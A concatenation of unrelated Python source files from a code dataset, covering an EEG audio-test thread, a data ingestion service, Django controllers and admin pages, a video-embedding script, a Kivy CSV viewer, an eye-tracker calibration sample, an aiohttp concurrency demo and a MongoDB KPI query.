self._stopevent = Event()\n\n super(EEGStoryTrainThread, self).__init__(self.test_name,\n sessionFilepath=sessionFilepath,\n socketio=socketio,\n participant=participant)\n\n self.toSave = ['trial_ind', 'answers', 'question', 'selected_q', 'nTrials', 'wav_files', 'test_name']\n\n\n self.socketio.on_event('submit_response', self.submitTestResponse, namespace='/main')\n self.socketio.on_event('finalise_results', self.finaliseResults, namespace='/main')\n self.loadStimulus()\n\n self.dev_mode = False\n\n def setQuestion(self, q):\n self.socketio.emit('set_question', data=q[0], namespace='/main')\n\n def testLoop(self):\n '''\n Main loop for iteratively finding the SRT\n '''\n self.waitForPageLoad()\n self.fillTable()\n self.socketio.emit('test_ready', namespace='/main')\n # For each stimulus\n trials = list(zip(self.wav_files, self.question))[self.trial_ind:]\n for (wav, q) in trials:\n self.saveState(out=self.backupFilepath)\n self.displayInstructions()\n self.setQuestion(q)\n self.waitForPartReady()\n if self._stopevent.isSet() or self.finishTest:\n break\n # Play concatenated matrix sentences at set SNR\n\n self.playStimulus(wav)\n self.waitForResponse()\n if self._stopevent.isSet() or self.finishTest:\n break\n self.processResponse()\n self.trial_ind += 1\n self.saveState(out=self.backupFilepath)\n if not self._stopevent.isSet():\n self.unsetPageLoaded()\n self.socketio.emit('processing-complete', namespace='/main')\n self.waitForPageLoad()\n self.fillTable()\n 
self.waitForFinalise()\n\n def submitTestResponse(self, msg):\n '''\n Get and store participant response for current trial\n '''\n self.answer = msg\n self.newResp = True\n\n def processResponse(self):\n '''\n '''\n self.newResp = False\n self.answers[self.trial_ind] = self.answer\n self.socketio.emit('test_resp', {'trial_ind': self.trial_ind, \"ans\": self.answer}, namespace='/main')\n\n def fillTable(self):\n '''\n '''\n for ind, ans in enumerate(self.answers):\n self.socketio.emit('test_resp', {'trial_ind': ind, \"ans\": ans}, namespace='/main')\n\n def loadStimulus(self):\n '''\n '''\n self.wav_files = natsorted(globDir(self.stimDir, '*.wav'))\n q_files = natsorted(globDir(self.stimDir, '*.csv'))\n for wav_file, q_file in zip(self.wav_files, q_files):\n q_lines = []\n with open(q_file, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n q_lines.append((int(line[0]), line[1:]))\n q_ind = randint(0, len(q_lines)-1)\n self.question.append(q_lines[q_ind][1])\n\n\n def displayInstructions(self):\n self.socketio.emit('display_instructions', namespace='/main')\n\n def playStimulus(self, wav):\n '''\n Output audio stimulus from numpy array\n '''\n self.newResp = False\n self.socketio.emit(\"stim_playing\", namespace=\"/main\")\n x, fs, _ = sndio.read(wav)\n if self.participant.parameters['hl_sim_active']:\n y = apply_hearing_loss_sim(x, fs)\n # Play audio\n if not self.dev_mode:\n sd.play(y, fs, blocking=True)\n else:\n self.play_wav('./da_stim/DA_170.wav', '')\n self.socketio.emit(\"stim_done\", namespace=\"/main\")\n\n # def playStimulus(self, wav_file, replay=False):\n\n # x, fs, _ = sndio.read(wav_file)\n # self.newResp = False\n # self.socketio.emit(\"stim_playing\", namespace=\"/main\")\n # # if not replay:\n # # self.y = self.generateTrial(self.snr)\n # # Play audio\n # # sd.play(self.y, self.fs, blocking=True)\n # if not self.dev_mode:\n # self.play_wav(wav_file, 'finish_test')\n # else:\n # self.play_wav('./da_stim/DA_170.wav', 'finish_test')\n\n # self.socketio.emit(\"stim_done\", namespace=\"/main\")\n\n\n def saveState(self, out=\"test_state.pkl\"):\n saveDict = {k:self.__dict__[k] for k in self.toSave}\n with open(out, 'wb') as f:\n dill.dump(saveDict, f)\n","sub_path":"eeg_story_train_thread.py","file_name":"eeg_story_train_thread.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"643673322","text":"#!/usr/bin/env python\n'''\n@author Luke Campbell \n@file ingestion_management_service_a.py\n@date 06/21/12 17:43\n@description DESCRIPTION\n'''\nfrom pyon.public import PRED, RT\nfrom pyon.util.arg_check import validate_is_instance, validate_true\nfrom interface.services.dm.iingestion_management_service import BaseIngestionManagementService\nfrom interface.objects import IngestionConfiguration, IngestionQueue, StreamQuery\n\n\nclass IngestionManagementService(BaseIngestionManagementService):\n\n def create_ingestion_configuration(self,name='', exchange_point_id='', queues=None):\n validate_is_instance(queues,list,'The queues parameter is not a proper list.')\n validate_true(len(queues)>0, 'Ingestion needs at least one queue to ingest from')\n for queue in queues:\n validate_is_instance(queue, IngestionQueue)\n\n ingestion_config = IngestionConfiguration()\n\n ingestion_config.name = name\n ingestion_config.exchange_point = exchange_point_id\n ingestion_config.queues = queues\n\n config_id, rev = self.clients.resource_registry.create(ingestion_config)\n\n return 
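# Sketch of the saveState pattern above in both directions; dill extends pickle to
# cover more object types, and the state keys below are illustrative:
import dill

state = {'trial_ind': 3, 'answers': ['yes', '', '', '']}
with open('test_state.pkl', 'wb') as f:
    dill.dump(state, f)
with open('test_state.pkl', 'rb') as f:
    restored = dill.load(f)
assert restored == state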
config_id\n\n def read_ingestion_configuration(self, ingestion_configuration_id=''):\n return self.clients.resource_registry.read(ingestion_configuration_id)\n\n def update_ingestion_configuration(self, ingestion_configuration=None):\n return self.clients.resource_registry.update(ingestion_configuration)\n\n def delete_ingestion_configuration(self, ingestion_configuration_id=''):\n assocs = self.clients.resource_registry.find_associations(subject=ingestion_configuration_id, predicate=PRED.hasSubscription, id_only=False)\n for assoc in assocs:\n self.clients.resource_registry.delete_association(assoc)\n self.clients.pubsub_management.delete_subscription(assoc.o)\n return self.clients.resource_registry.delete(ingestion_configuration_id)\n\n def list_ingestion_configurations(self, id_only=False):\n resources, _ = self.clients.resource_registry.find_resources(restype=RT.IngestionConfiguration,id_only=id_only)\n return resources\n\n\n # --- \n\n def persist_data_stream(self, stream_id='', ingestion_configuration_id='', dataset_id=''):\n # Figure out which MIME or xpath in the stream definition belongs where\n\n # Just going to use the first queue for now\n\n validate_is_instance(stream_id,basestring, 'stream_id %s is not a valid string' % stream_id)\n validate_true(dataset_id,'Clients must specify the dataset to persist')\n\n ingestion_config = self.read_ingestion_configuration(ingestion_configuration_id)\n if self.is_persisted(stream_id):\n raise BadRequest('This stream is already being persisted')\n stream = self.clients.pubsub_management.read_stream(stream_id)\n stream.persisted = True\n self.clients.pubsub_management.update_stream(stream)\n\n ingestion_queue = self._determine_queue(stream_id, ingestion_config.queues)\n\n subscription_id = self.clients.pubsub_management.create_subscription(\n query=StreamQuery(stream_ids=[stream_id]),\n exchange_name=ingestion_queue.name,\n exchange_point=ingestion_config.exchange_point\n )\n\n self.clients.pubsub_management.activate_subscription(subscription_id=subscription_id)\n\n self.clients.resource_registry.create_association(\n subject=ingestion_configuration_id,\n predicate=PRED.hasSubscription,\n object=subscription_id\n )\n self._existing_dataset(stream_id,dataset_id)\n return dataset_id\n\n def unpersist_data_stream(self, stream_id='', ingestion_configuration_id=''):\n subscriptions, assocs = self.clients.resource_registry.find_objects(subject=ingestion_configuration_id, predicate=PRED.hasSubscription, id_only=True)\n\n stream = self.clients.pubsub_management.read_stream(stream_id)\n stream.persisted = False\n self.clients.pubsub_management.update_stream(stream)\n\n for i in xrange(len(subscriptions)):\n subscription = subscriptions[i]\n assoc = assocs[i]\n # Check if this subscription is the one with the stream_id\n\n if len(self.clients.resource_registry.find_associations(subject=subscription, object=stream_id))>0: # this subscription has this stream\n self.clients.pubsub_management.deactivate_subscription(subscription_id=subscription)\n self.clients.resource_registry.delete_association(assoc)\n self.clients.pubsub_management.delete_subscription(subscription)\n\n datasets, _ = self.clients.resource_registry.find_subjects(subject_type=RT.DataSet,predicate=PRED.hasStream,object=stream_id,id_only=True)\n for dataset_id in datasets:\n self.clients.dataset_management.remove_stream(dataset_id, stream_id)\n\n def is_persisted(self, stream_id=''):\n stream = self.clients.pubsub_management.read_stream(stream_id)\n return stream.persisted\n\n def 
_determine_queue(self,stream_id='', queues=[]):\n # For now just return the first queue until stream definition is defined\n return queues[0]\n\n def _existing_dataset(self,stream_id='', dataset_id=''):\n self.clients.dataset_management.add_stream(dataset_id,stream_id)\n\n\n\n","sub_path":"ion/services/dm/ingestion/ingestion_management_service.py","file_name":"ingestion_management_service.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"586780654","text":"from .BaseCtl import BaseCtl\nfrom django.shortcuts import render\nfrom ORS.utility.DataValidator import DataValidator\nfrom service.forms import CollegeForm\nfrom service.models import College\nfrom service.service.CollegeService import CollegeService\n\n\nclass CollegeListCtl(BaseCtl):\n count = 1\n\n def request_to_form(self, requestForm):\n self.form[\"collegeName\"] = requestForm.get(\"collegeName\", None)\n self.form[\"collegeAddress\"] = requestForm.get(\"collegeAddress\", None)\n self.form[\"collegeState\"] = requestForm.get(\"collegeState\", None)\n self.form[\"collegeCity\"] = requestForm.get(\"collegeCity\", None)\n self.form[\"collegePhoneNumber\"] = requestForm.get(\"collegePhoneNumber\", None)\n self.form[\"ids\"] = requestForm.getlist(\"ids\", None)\n\n def display(self, request, params={}):\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def next(self, request, params={}):\n CollegeListCtl.count += 1\n self.form[\"pageNo\"] = CollegeListCtl.count\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def previous(self, request, params={}):\n CollegeListCtl.count -= 1\n self.form[\"pageNo\"] = CollegeListCtl.count\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def submit(self, request, params={}):\n self.request_to_form(request.POST)\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n res = render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n return res\n\n def get_template(self):\n return \"ors/CollegeList.html\"\n\n # Service of College\n\n def get_service(self):\n return CollegeService()\n\n def deleteRecord(self, request, params={}):\n CollegeListCtl.count += 1\n self.form[\"pageNo\"] = 1\n if (bool(self.form[\"ids\"]) == False):\n self.form[\"error\"] = True\n self.form[\"message\"] = \"Please Select at least one check box\"\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n return render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n else:\n for ids in self.form[\"ids\"]:\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n id = int(ids)\n if (id > 0):\n r = self.get_service().get(id)\n if r is not None:\n self.get_service().delete(r.id)\n record = self.get_service().search(self.form)\n self.page_list = record[\"data\"]\n self.form[\"pageNo\"] = 1\n self.form[\"error\"] = False\n self.form[\"message\"] = \"DATA IS SUCCESSFULLY DELETED\"\n return render(request, self.get_template(), {\"pageList\": 
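# CollegeListCtl above stores the current page in a class attribute (count), which
# is shared across all requests and users. A sketch of the usual stateless
# alternative: derive the page from each request (parameter name illustrative):
def get_page_no(request, default=1):
    try:
        return max(1, int(request.GET.get('pageNo', default)))
    except (TypeError, ValueError):
        return default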
self.page_list, \"form\": self.form})\n else:\n self.form[\"error\"] = True\n self.form[\"message\"] = \"Data is not deleted\"\n return render(request, self.get_template(), {\"pageList\": self.page_list, \"form\": self.form})\n","sub_path":"ORS/ctl/CollegeListCtl.py","file_name":"CollegeListCtl.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"653703250","text":"# -*- coding: UTF-8 -*-\n\nfrom django.contrib import admin\nfrom django.contrib.auth.models import Group\nfrom django.db.models import Count\nfrom django.utils.encoding import smart_text\nfrom .models import UserPreferences, SHIRT_TYPES_CHOICES, Organization, Participant, Waiting\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n list_display = ('get_full_name', 'email')\n\n\nclass RoomsFilter(admin.SimpleListFilter):\n # Human-readable title which will be displayed in the\n # right admin sidebar just above the filter options.\n title = 'posiada pokój'\n\n # Parameter for the filter that will be used in the URL query.\n parameter_name = 'room'\n\n def lookups(self, request, model_admin):\n \"\"\"\n Returns a list of tuples. The first element in each\n tuple is the coded value for the option that will\n appear in the URL query. The second element is the\n human-readable name for the option that will appear\n in the right sidebar.\n \"\"\"\n return (\n ('Yes', 'Tak'),\n ('No', 'Nie'),\n )\n\n def queryset(self, request, queryset):\n \"\"\"\n Returns the filtered queryset based on the value\n provided in the query string and retrievable via\n `self.value()`.\n \"\"\"\n # Compare the requested value (either '80s' or '90s')\n # to decide how to filter the queryset.\n if self.value() == 'Yes':\n return queryset.annotate(num_rooms=Count('user__userinroom')).filter(num_rooms=1)\n if self.value() == 'No':\n return queryset.annotate(num_rooms=Count('user__userinroom')).filter(num_rooms=0)\n\n\nclass UserPreferencesAdmin(admin.ModelAdmin):\n list_per_page = 400\n list_display = ('user_name', 'user_email', 'org',\n 'days',\n 'breakfasts',\n 'dinners',\n 'vegetarian',\n 'shirt',\n 'bus',\n 'want_bus',\n 'ZOSIA_cost',\n 'paid',\n 'minutes_early', 'date_joined',\n 'last_login')\n list_filter = ['bus_hour', 'paid', 'bus', 'want_bus', RoomsFilter, 'breakfast_2', 'breakfast_3',\n 'breakfast_4', 'dinner_1', 'dinner_2', 'dinner_3', 'day_1', 'day_2', 'day_3', 'shirt_size', 'shirt_type', 'org']\n list_editable = ('minutes_early', 'paid')\n list_select_related = ('user',)\n\n def user_name(self, item):\n return smart_text(item.user.get_full_name())\n\n def user_email(self, item):\n return str(item.user.email)\n\n def date_joined(self, obj):\n return obj.user.date_joined\n date_joined.short_description = 'date_joined'\n date_joined.admin_order_field = 'user__date_joined'\n\n def last_login(self, obj):\n return obj.user.last_login\n last_login.short_description = 'last_login'\n last_login.admin_order_field = 'user__last_login'\n\n def anim_icon(self,id):\n return '\"loading\"'%id\n yes_icon = '\"Yes\"'\n no_icon = '\"No\"'\n def onclick(self,id,obj):\n return \"\"\"if(confirm('Do you want to register payment from %s?')) {\n document.getElementById('anim%s').style.display='inline';\n xhr = new XMLHttpRequest();\n xhr.onreadystatechange = function() {\n if(xhr.readyState == 4) {\n document.getElementById('anim%s').style.display='none';\n if( xhr.status == 200) {\n window.location.reload();\n }\n }\n };\n xhr.open('POST', '/admin/register_payment/', true);\n 
xhr.send('id=%s');\n }\"\"\" % (obj, id, id, id)\n def bus_onclick(self,obj):\n id = obj.id\n return \"\"\"if(confirm('Do you want to register transport payment from %s?')) {\n //document.getElementById('anim%s').style.display='inline';\n xhr = new XMLHttpRequest();\n xhr.onreadystatechange = function() {\n if(xhr.readyState == 4) {\n //document.getElementById('anim%s').style.display='none';\n if( xhr.status == 200) {\n window.location.reload();\n }\n }\n };\n xhr.open('POST', '/admin/register_bus_payment/', true);\n xhr.send('id=%s');\n }\"\"\" % (obj, id, id, id)\n\n\n def ZOSIA_cost(self, obj):\n if obj.paid:\n return \"%s %s z\\u0142\" % ( self.yes_icon, obj.count_payment() )\n else:\n return '%s %s z\\u0142 %s' % (\n self.onclick(obj.id,obj), self.no_icon, obj.count_payment(), self.anim_icon(obj.id))\n ZOSIA_cost.allow_tags = True\n\n def bus_cost(self, obj):\n # if user doesn't wanna get but, so he shouldn't\n if not obj.bus:\n return \"%s -\" % self.no_icon\n elif obj.paid_for_bus:\n return \"%s %s z\\u0142\" % ( self.yes_icon, \"40\" )\n else:\n return '%s %s z\\u0142' % ( self.bus_onclick(obj), self.no_icon, \"40\" )\n bus_cost.allow_tags = True\n\n shirt_types = {}\n for i in 0,1:\n v = SHIRT_TYPES_CHOICES.__getitem__(i)\n shirt_types[v.__getitem__(0)] = v.__getitem__(1)\n def shirt(self, obj):\n return \"%s (%s)\" % (\n self.shirt_types[obj.shirt_type],\n obj.shirt_size)\n\n def f(self,o):\n def g(x):\n if o.__dict__[x]: return self.yes_icon\n else: return self.no_icon\n return g\n # note: these three methods should not be separated\n # but generated through lamba function\n # do it in spare time\n def breakfasts(self,obj):\n lst = ['breakfast_2', 'breakfast_3', 'breakfast_4']\n return \" \".join(map(self.f(obj),lst))\n breakfasts.allow_tags = True\n\n def dinners(self,obj):\n lst = ['dinner_1', 'dinner_2', 'dinner_3']\n return \" \".join(map(self.f(obj),lst))\n dinners.allow_tags = True\n\n def days(self,obj):\n lst = ['day_1', 'day_2', 'day_3']\n return \" \".join(map(self.f(obj),lst))\n days.allow_tags = True\n\n\nclass OrganizationAdmin(admin.ModelAdmin):\n list_display = ('name', 'accepted')\n\nclass WaitingAdmin(admin.ModelAdmin):\n list_display = ('user', 'day_1', 'day_2', 'day_3')\n\nadmin.site.unregister(Group)\nadmin.site.register(Waiting, WaitingAdmin)\nadmin.site.register(UserPreferences, UserPreferencesAdmin)\nadmin.site.register(Organization, OrganizationAdmin)\nadmin.site.register(Participant, ParticipantAdmin)\n","sub_path":"wsgi/zosiaproject/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329566878","text":"import torch as th\nimport numpy as np\nfrom s3dg import S3D\nimport numpy as np\n\ndef main():\n # see model input data\n # data = np.load('s3d_dict.npy')\n\n # Instantiate the model\n net = S3D('s3d_dict.npy', 512)\n\n # Load the model weights\n net.load_state_dict(th.load('s3d_howto100m.pth'))\n\n # Video input should be of size Batch x 3 x T x H x W and normalized to [0, 1]\n # video1 = th.rand(2, 3, 32, 224, 224)\n # print(video1.shape)\n # print(type(video1))\n video = th.from_numpy(np.load(\"../video_feature_extractor/output/_0flfBHjVKU_features.npy\"))\n print(video.shape)\n print(type(video))\n\n # Evaluation mode\n net = net.eval()\n\n # Video inference\n '''\n video_output is a dictionary containing two keys:\n\n video_embedding: This is the video embedding (size 512) from the joint text-video space. 
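# Sketch around the inference pattern in main.py above: eval() switches layers
# like dropout/batch-norm to inference behaviour, and torch.no_grad() (not used
# in the record, shown here as a common companion) skips gradient tracking.
# The model and shapes below are illustrative.
import torch

model = torch.nn.Linear(4, 2).eval()
with torch.no_grad():
    out = model(torch.rand(3, 4))
print(out.shape)  # torch.Size([3, 2])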
\n It should be used to compute similarity scores with text inputs using the text embedding.\n \n mixed_5c: This is the global averaged pooled feature from S3D of dimension 1024. \n This should be use for classification on downstream tasks.\n '''\n video_output = net(video)\n print(video_output['mixed_5c'])\n print(video_output['mixed_5c'].shape)\n print(type(video_output['mixed_5c']))\n #\n # # Text inference\n # text_output = net.text_module(['open door', 'cut tomato'])\n\n # print(text_output)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211879689","text":"import csv\nfrom collections import namedtuple\n\nfrom kivy.app import App\nfrom kivy.clock import Clock\nfrom kivy.metrics import dp\nfrom kivy.utils import platform\nfrom kivy.logger import Logger, LOG_LEVELS\nLogger.setLevel(LOG_LEVELS['debug'])\nfrom kivy.properties import *\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.filechooser import FileChooserListView\n\nfrom kivymd.theming import ThemeManager\nfrom kivymd.toolbar import Toolbar\nfrom kivymd.dialog import MDDialog\nfrom kivymd.label import MDLabel\n\nTRANSACTION_COLUMNS = ['who_paid', 'amount', 'currency', 'for_whom',\n 'split_amounts', 'purpose', 'category', 'date_time',\n 'exchange_rate', 'converted_amount', 'type', 'receipt']\n\nTABLE_COLUMN_NAMES = ['Purpose', 'Category', 'Date & time']\n\n################################################################################\n# Internal transactions.csv logic\n################################################################################\n\n\nclass Transaction(namedtuple('Transaction', TRANSACTION_COLUMNS)):\n def to_better_transaction(self):\n for_whom = self.for_whom.split(';')\n split_amounts = map(float, self.split_amounts.split(';'))\n if self.exchange_rate.strip(): # self.currency != \"EUR\":\n exchange_rate = float(self.exchange_rate.split(':')[1])\n split_amounts = [amount/exchange_rate for amount in split_amounts]\n amounts = dict(zip(for_whom, split_amounts))\n return BetterTransaction(self.purpose, self.category, self.date_time,\n amounts)\n\n\nclass BetterTransaction:\n def __init__(self, purpose, category, date_time, amounts):\n self.purpose = purpose\n self.category = category\n self.date_time = date_time\n self.amounts = amounts\n\n def to_row(self, names):\n content = [self.purpose, self.category, self.date_time]\n content += [str(self.amounts.get(name, 0)) for name in names]\n return content\n\n\ndef extract_names(filename):\n found_names = set()\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n next(reader) # skip the first line\n for row in reader:\n trans = Transaction(*row)\n found_names |= set(trans.who_paid.split(';'))\n found_names |= set(trans.for_whom.split(';'))\n return list(found_names)\n\n\ndef extract_rows(filename, names):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for row in reader:\n trans = Transaction(*row)\n yield trans.to_better_transaction().to_row(names)\n\n################################################################################\n# Table widget\n################################################################################\n\n\nclass Header(BoxLayout):\n text = StringProperty()\n\n\nclass Cell(BoxLayout):\n text = StringProperty()\n\n\nclass 
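# Sketch of the Transaction.to_better_transaction parsing above: ';'-separated
# fields become per-person amounts, optionally divided by an exchange rate of the
# form 'CUR:rate' (the row values below are illustrative):
for_whom = "alice;bob".split(';')
split_amounts = list(map(float, "10;6".split(';')))
exchange_rate = float("USD:0.5".split(':')[1])
amounts = dict(zip(for_whom, (a / exchange_rate for a in split_amounts)))
print(amounts)  # {'alice': 20.0, 'bob': 12.0}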
Table(BoxLayout):\n color = [128, 0, 2, 0.8]\n cols = NumericProperty(1)\n content = ListProperty([['col 1', 'col 2'],\n ['row 11', 'row 21'],\n ['row 12', 'row 22']],\n allownone=True)\n\n def on_content(self, instance=None, value=None):\n if not self.ids:\n Clock.schedule_once(self.on_content)\n else:\n self.cols = len(self.content[0])\n for header in self.content[0]:\n self.ids['header'].add_widget(Header(text=header.upper()))\n for row in self.content[1:]:\n for element in row:\n self.ids['body'].add_widget(Cell(text=element))\n\n################################################################################\n# Custom screens\n################################################################################\n\n\nclass WelcomeScreen(BoxLayout):\n pass\n\n\nclass OverviewScreen(FloatLayout):\n filename = StringProperty()\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n names = extract_names(self.filename)\n table_content = [TABLE_COLUMN_NAMES+names]\n table_content += list(extract_rows(self.filename, names))\n self.add_widget(Table(content=table_content))\n\n\nclass MainWindow(BoxLayout):\n def open_overview(self, filename):\n self.overview_screen = OverviewScreen(filename=filename)\n self.add_widget(self.overview_screen)\n\n\nclass SettleUpOverviewApp(App):\n theme_cls = ThemeManager()\n\n def build(self):\n Logger.info('Application: System: '+platform)\n return MainWindow()\n\n def file_chosen(self):\n file_chooser = self.root.ids.welcome_screen.ids.file_chooser\n filename = file_chooser.selection[0]\n Logger.debug('Application: Chosen file: '+filename)\n self.root.remove_widget(self.root.ids.welcome_screen)\n self.root.open_overview(filename)\n\n\nif __name__ == \"__main__\":\n app = SettleUpOverviewApp()\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"483109754","text":"import psychopy.visual\nimport psychopy.event\nimport psychopy.core\nimport sys\nimport random\n\nimport GazeParser.TrackingTools\n\nimport wx\n\nclass FileWindow(wx.Frame):\n def __init__(self,parent,id,title):\n wx.Frame.__init__(self,parent,id,title)\n \n panel = wx.Panel(self,wx.ID_ANY)\n \n vbox = wx.BoxSizer(wx.VERTICAL)\n \n addressBox = wx.BoxSizer(wx.HORIZONTAL)\n addressBox.Add(wx.StaticText(panel,wx.ID_ANY,'SimpleGazeTracker address',size=(160,30)),0)\n self.addressEdit = wx.TextCtrl(panel,wx.ID_ANY)\n self.addressEdit.SetValue('192.168.1.1')\n addressBox.Add(self.addressEdit,1)\n vbox.Add(addressBox, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10)\n \n imgsizeBox = wx.BoxSizer(wx.HORIZONTAL)\n imgsizeBox.Add(wx.StaticText(panel,wx.ID_ANY,'Capture image size',size=(160,30)),0)\n self.imgsizeEdit = wx.TextCtrl(panel,wx.ID_ANY)\n self.imgsizeEdit.SetValue('640,480')\n imgsizeBox.Add(self.imgsizeEdit,1)\n vbox.Add(imgsizeBox, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10)\n \n isdummyBox = wx.BoxSizer(wx.HORIZONTAL)\n self.isdummyCheck = wx.CheckBox(panel,wx.ID_ANY,'Use dummy mode (for standalone debug)')\n isdummyBox.Add(self.isdummyCheck)\n vbox.Add(isdummyBox, 0, wx.ALIGN_CENTER | wx.CENTER, 10)\n \n vbox.Add((-1, 25))\n \n okBox = wx.BoxSizer(wx.HORIZONTAL)\n okButton = wx.Button(panel,wx.ID_ANY, 'Ok', size=(70, 30))\n self.Bind(wx.EVT_BUTTON, self.quitfunc, okButton)\n okBox.Add(okButton)\n vbox.Add(okBox, 0, wx.ALIGN_CENTER | wx.CENTER, 10)\n \n panel.SetSizer(vbox)\n \n self.Show(True)\n \n def quitfunc(self, event):\n global 
FileWindowValues\n address = self.addressEdit.GetValue()\n imgsize = self.imgsizeEdit.GetValue()\n isdummy = self.isdummyCheck.GetValue()\n \n FileWindowValues = {'address':address,'imgsize':imgsize,'isdummy':isdummy}\n self.Close(True)\n\nFileWindowValues = {}\napplication = wx.App(False)\nfw = FileWindow(None,wx.ID_ANY,\"Sample05_PsychoPy\")\napplication.MainLoop()\n\n\nxy = FileWindowValues['imgsize'].split(',')\ncameraX = int(xy[0])\ncameraY = int(xy[1])\n\ntracker = GazeParser.TrackingTools.getController(backend='PsychoPy',dummy=FileWindowValues['isdummy'])\ntracker.setReceiveImageSize((cameraX,cameraY))\ntracker.connect(FileWindowValues['address'])\n\nwin = psychopy.visual.Window(size=(1024,768),units='pix')\n\ncalarea = (-400,-300,400,300)\ncalTargetPos = [[ 0, 0],\n [-350,-250],[-350, 0],[-350,250],\n [ 0,-250],[ 0, 0],[ 0,250],\n [ 350,-250],[ 350, 0],[ 350,250]]\n\ntracker.setCalibrationScreen(win)\ntracker.setCalibrationTargetPositions(calarea, calTargetPos)\n\nmsg = psychopy.visual.TextStim(win)\n\n#Slow\ntracker.setCalTargetMotionParams(durationPerPos=3.0, motionDuration=2.0)\ntracker.setCalSampleAcquisitionParams(numSamplesPerPos=10, getSampleDelay=0.4) #default\nmsg.setText('durationPerPos=3.0, motionDuration=2.5')\nmsg.draw()\nwin.flip()\npsychopy.event.waitKeys()\n\ntracker.calibrationLoop()\n\n","sub_path":"Samples/sample05_caltargetslow_PsychoPy.py","file_name":"sample05_caltargetslow_PsychoPy.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"11208803","text":"import aiohttp\nimport asyncio\nimport time\n\nasync def fetch_page(url):\n page_start = time.time()\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n print(response.status)\n print(f\"Page took {time.time() - page_start}\")\n return response.status\n\nloop = asyncio.get_event_loop()\n\n# We are getting coroutines objects, we not calling the function!!!\n# No requests are being made, only coroutines are being made\ntasks = [fetch_page('http://google.com') for i in range(50)]\n\nstart = time.time()\nloop.run_until_complete(asyncio.gather(*tasks))\nprint(f\"All took {time.time() - start}\")","sub_path":"Asynchronous Dev/async_request.py","file_name":"async_request.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645985455","text":"# -*- coding: utf-8 -*-\nfrom .. import models\nimport qmongo\nfrom qmongo import transaction\nimport datetime\nfrom bson import ObjectId\nfrom .. 
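# The asyncio record above drives 50 concurrent fetches with get_event_loop and
# run_until_complete; on Python 3.7+ the same fan-out is usually written with
# asyncio.run, sharing one ClientSession across requests rather than opening a new
# one per fetch. A sketch, same URL as the record (requires network access):
import asyncio
import aiohttp

async def fetch_status(session, url):
    async with session.get(url) as response:
        return response.status

async def main():
    async with aiohttp.ClientSession() as session:
        return await asyncio.gather(*(fetch_status(session, 'http://google.com') for _ in range(50)))

statuses = asyncio.run(main())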
import common\n\ndef get_list(args):\n\n searchText = args['data'].get('search', '')\n pageSize = args['data'].get('pageSize', 0)\n pageIndex = args['data'].get('pageIndex', 20)\n sort = args['data'].get('sort', 20)\n\n pageIndex = (lambda pIndex: pIndex if pIndex != None else 0)(pageIndex)\n pageSize = (lambda pSize: pSize if pSize != None else 20)(pageSize)\n search = (lambda x: x.strip() if searchText != None else \"\")(searchText)\n\n collection = qmongo.models.TMPER_TargetKPIDetail.aggregate\n collection.left_join(models.auth_user_info(), \"created_by\", \"username\", \"uc\")\n collection.left_join(models.auth_user_info(), \"modified_by\", \"username\", \"um\")\n collection.project(\n rec_id=1,\n ref_id=1,\n apr_period=1,\n apr_year=1,\n employee_code=1,\n target_name=1,\n perform_date=1,\n perform=1,\n note=1,\n created_by=\"uc.login_account\",\n created_on=\"created_on\",\n modified_on=\"switch(case(modified_on!='',modified_on),'')\",\n modified_by=\"switch(case(modified_by!='',um.login_account),'')\"\n )\n collection.match(\"ref_id == @ref_id\", ref_id = args['data']['rec_id'])\n\n if (searchText != None):\n collection.match(\"contains(target_name, @name) or contains(unit_name, @name)\" + \\\n \" or contains(weight, @name) or contains(target, @name)\" +\\\n \" or contains(min_value, @name) or contains(max_value, @name)\" + \\\n \" or contains(origin_target, @name)\", name=search.strip())\n\n if (sort != None):\n collection.sort(sort)\n\n return collection.get_page(pageIndex, 